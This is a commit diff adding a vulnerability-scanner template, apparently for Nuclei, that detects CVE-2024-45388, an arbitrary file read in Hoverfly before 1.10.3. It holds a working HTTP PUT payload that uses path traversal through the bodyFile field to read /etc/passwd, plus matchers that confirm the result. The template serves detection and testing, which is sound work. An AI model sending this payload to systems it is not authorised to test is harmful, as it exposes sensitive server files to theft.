Create CVE-2024-45388.yaml
parent
31e3feea8d
commit
3538485407
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2024-45388
|
||||
|
||||
info:
|
||||
name: Hoverfly < 1.10.3 - Arbitrary File Read
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: high
|
||||
description: |
|
||||
Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.
|
||||
reference:
|
||||
- https://github.com/advisories/GHSA-6xx4-x46f-f897
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-45388
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2024-45388
|
||||
cwe-id: CWE-20
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
tags: cve,cve2024,hoverfly,lfi
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
PUT /api/v2/simulation HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
{"data":{"pairs":[{"request":{},"response":{"bodyFile": "../../../../../../../etc/passwd","x":"aaa"}} ]},"meta":{"schemaVersion":"v5.3"}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- 'hoverflyVersion'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- application/json
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue